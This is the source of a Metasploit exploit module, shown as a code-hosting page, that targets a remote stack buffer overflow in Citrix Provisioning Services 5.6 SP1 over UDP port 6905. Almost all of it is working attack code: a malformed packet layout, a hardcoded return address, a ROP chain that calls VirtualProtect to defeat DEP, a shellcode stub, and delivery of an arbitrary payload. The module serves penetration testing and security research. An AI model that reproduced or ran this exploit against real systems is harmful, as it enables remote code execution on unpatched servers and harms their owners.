Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
19715 views
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::Remote::Udp1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',17'Description' => %q{18This module exploits a remote buffer overflow in the Citrix Provisioning Services195.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the206905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,21Windows 7, and Windows XP SP3.22},23'License' => MSF_LICENSE,24'Author' => [25'AbdulAziz Hariri', # Initial discovery via ZDI26'alino <26alino[at]gmail.com>' # Metasploit module27],28'References' => [29['OSVDB', '75780'],30['BID', '49803'],31['ZDI', '12-009'],32['URL', 'http://support.citrix.com/article/CTX130846']33],34'DefaultOptions' => {35'EXITFUNC' => 'process',36'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',37},38'Payload' => {39'BadChars' => "\x00",40'EncoderOptions' => { 'BufferRegister' => 'ECX' },41},42'Platform' => ['win'],43'Targets' => [44[45'Citrix Provisioning Services 5.6 SP1',46{47'Offset' => 2012,48'Ret' => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe49}50]51],52'Privileged' => true,53'DisclosureDate' => '2011-11-04', # CTX130846 creation date54'DefaultTarget' => 0,55'Notes' => {56'Reliability' => UNKNOWN_RELIABILITY,57'Stability' => UNKNOWN_STABILITY,58'SideEffects' => UNKNOWN_SIDE_EFFECTS59}60)61)6263register_options([Opt::RPORT(6905)])64end6566def exploit67packet = "\x00\x00\x02\x40" # DATA MSG68packet << rand_text_alpha_upper(18)69packet << "\x00\x00\x00\x00" # Length70packet << rand_text_alpha_upper(target['Offset'])71packet << [target.ret].pack('V')7273rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe7475rop_gadgets =76[770x0045b141, # POP EAX; RETN streamprocess.exe780x1009a1bc, # VirtualProtect()790x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe800x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe810x004ad0cf, # POP EBP; RETN streamprocess.exe820x00455d9d, # PUSH ESP; RETN streamprocess.exe830x00497f5a, # POP EAX; RETN streamprocess.exe840xfffff9d0, # dwSize850x00447669, # NEG EAX; RETN streamprocess.exe860x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe870x00426305, # POP ECX; RETN streamprocess.exe880x00671fb9, # lpflOldProtect890x004e41e6, # POP EDI; RETN streamprocess.exe900x0040f004, # RETN streamprocess.exe910x00495c05, # POP EAX; RETN streamprocess.exe920xffffffc0, # flNewProtect930x0042c79a, # NEG EAX; RETN streamprocess.exe940x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe950x0045c1fa, # POP EAX; RETN streamprocess.exe960x90909090, # NOP970x00435bbe, # PUSHAD; RETN streamprocess.exe98].pack("V*")99100packet[258, rop_nop.length] = rop_nop101packet[410, rop_gadgets.length] = rop_gadgets102packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"103packet[504, payload.encoded.length] = payload.encoded104105print_status("Trying target #{target.name}...")106107connect_udp108udp_sock.put(packet)109110handler111disconnect_udp112end113end114115116